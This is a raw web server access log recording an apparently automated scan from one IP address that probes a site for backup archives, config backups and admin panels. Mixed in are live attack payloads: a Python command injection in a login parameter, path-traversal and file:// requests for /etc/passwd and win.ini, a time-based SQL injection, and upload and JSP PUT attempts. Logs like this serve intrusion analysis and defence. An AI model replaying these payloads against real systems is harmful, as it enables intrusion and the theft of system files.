205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /web.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /config.php~ HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /UPGRADE.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /web.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /index.php.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /UPGRADE.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /ftp.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /config.php.bak HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /UPGRADE HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /ftp.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /db.php.bak HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "POST /server/index.php?s=/api/user/login HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /irvsrzcrvw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /ftp.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /config.inc.php.bak HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /ftp.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /readme.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:53 +0530] "GET /.index.php.swp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /zxggydxfwm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /ftp.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /includes/mysql2i/mysql2i.func.php HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /.config.inc.php.swp HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /ftp.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /proxy.pac HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /config/.config.php.swp HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /ftp.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:54 +0530] "GET /.config.php.swp HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /database.zip HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /.settings.php.swp HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /database.tar.gz HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /.database.php.swp HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /database.rar HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /.db.php.swp HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:55 +0530] "GET /database.7z HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /.mysql.php.swp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /database.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /yyvvdbasng HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /database.tgz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /index.cgi.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:56 +0530] "GET /database.tar.bz2 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:57 +0530] "GET /data.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:57 +0530] "GET /data.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:57 +0530] "GET /ugaexrhzan HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:57 +0530] "GET /data.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:57 +0530] "GET /index.bak HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /changePassword?username=nyfxga HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /data.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /nlpbcogerz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /data.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /config.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /ogkasbuztm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /data.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /ui/login.php?user=admin HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /conf.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:58 +0530] "GET /data.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /conf/conf.zip HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /db.zip HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /o.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /db.tar.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /x.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /db.rar HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:59 +0530] "GET /output.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /db.7z HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /backup.sql.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /db.gz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /database.sql.gz HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /webadmin/tools/unixlogin.php?login=admin&password=g'%2C'')%3Bimport%20os%3Bos.system('echo%20hudaejgk%20%3E%20log18786.txt')%23&timeout=5 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /db.tgz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:00 +0530] "GET /dump.sql.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /db.tar.bz2 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /db.sql.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /backup.zip HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /iyxxmfsdci HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=xxx&max_rows=10 HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /back.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /backup.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /help/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /mcnwwogemg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:01 +0530] "GET /backup.rar HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /a.zip HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /backup.7z HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /a.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /backup.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /a.rar HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:02 +0530] "GET /backup.tgz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /a.7z HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /backup.tar.bz2 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /a.gz HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /test.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /a.tgz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /test.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /a.tar.bz2 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:03 +0530] "GET /test.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /test.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /1.zip HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /test.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /1.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /test.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /1.rar HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:04 +0530] "GET /slqczxcsgw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /test.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /index.php?q=file:///etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /1.7z HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /core HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /tmp.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /index.php?q=file:///C:/Windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /1.gz HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /tmp.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:05 +0530] "GET /1.tgz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /tmp.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /1.tar.bz2 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /tmp.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /old.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /tmp.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /old.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /tmp.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:06 +0530] "GET /old.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "POST /php/ping.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /tmp.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /old.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /temp.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /bpvggshphl HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /temp.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /old.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:07 +0530] "GET /composer.json HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /temp.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /old.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /composer.lock HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /old.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /temp.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /temp.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /index.zip HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:08 +0530] "GET /vdwsgkdbeq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /temp.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /index.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /requirements.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /temp.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /index.rar HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "PUT /ahvrke.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /103.10.134.234.zip HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /index.7z HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /103.10.134.234.tar.gz HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:53:09 +0530] "GET /index.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 1222
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /103.10.134.234.rar HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /vdwgigohqc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /index.tgz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /103.10.134.234.7z HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /cacti/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /index.tar.bz2 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /103.10.134.234.gz HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:53:10 +0530] "GET /sql.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "GET /103.10.134.234.tgz HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "GET /sql.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "GET /103.10.134.234.tar.bz2 HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "GET /sql.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "GET /sql.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:11 +0530] "POST /defaultroot/upload/fileUpload.controller HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:20:53:12 +0530] "GET /sql.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:12 +0530] "GET /sql.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:12 +0530] "GET /sxgyddamfb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:53:13 +0530] "GET /sql.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:13 +0530] "GET /memadmin/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:13 +0530] "GET /package.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:13 +0530] "GET /package.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:13 +0530] "GET /package.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:14 +0530] "GET /package.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:14 +0530] "GET /package.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:14 +0530] "GET /html/log HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:14 +0530] "GET /package.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:14 +0530] "GET /services/system/info.html HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /package.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /website.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /vfdydeogou HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /index.php?user/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /website.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /phpmyadmin/index.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:53:15 +0530] "GET /website.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /_phpmyadmin/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /website.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /phpMyAdmin/index.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /website.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /pma/index.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:16 +0530] "GET /website.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:17 +0530] "GET /website.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:17 +0530] "GET /download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:17 +0530] "GET /upload.zip HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:17 +0530] "GET /laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:53:17 +0530] "GET /upload.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "GET /upload.rar HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "GET /qtkbpqlegt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "GET /upload.7z HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "GET /.svn/entries HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:18 +0530] "GET /upload.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:19 +0530] "GET /upload.tgz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:19 +0530] "GET /upload.tar.bz2 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:19 +0530] "GET /admin.zip HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:19 +0530] "GET /admin.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:20 +0530] "GET /admin.rar HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:20 +0530] "POST /source/pack/upload/index-uplog.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:53:20 +0530] "GET /admin.7z HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:20 +0530] "GET /admin.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:20 +0530] "GET /ygsmytgewt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:21 +0530] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:53:21 +0530] "GET /admin.tgz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:21 +0530] "GET /source/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:21 +0530] "GET /admin.tar.bz2 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:21 +0530] "GET /wwwroot.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET /wwwroot.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET /wwwroot.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET /wwwroot.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:53:22 +0530] "GET /wwwroot.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /wwwroot.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /cuqigwcqox HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /wwwroot.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /readme.md HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /www.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:23 +0530] "GET /readme.txt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /www.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /readme HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /www.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /README.md HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /www.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:24 +0530] "GET /README.txt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /www.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /README HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /www.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(4)+or+' HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /LICENSE.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /www.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /LICENSE.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /web.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:25 +0530] "GET /LICENSE HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /dcfzcehqck HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /config/list HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /web.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /CHANGELOG.md HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /data.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /web.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:26 +0530] "GET /CHANGELOG.txt HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /web.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /CHANGELOG HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /changelog.md HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /web.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /changelog.txt HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /web.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /changelog HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /web.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:27 +0530] "GET /artifactory/api/access/api/v1/users HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /CONTRIBUTING.md HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /ftp.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /CONTRIBUTING.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /toyhwfolda HTTP/1.1" 404 1014
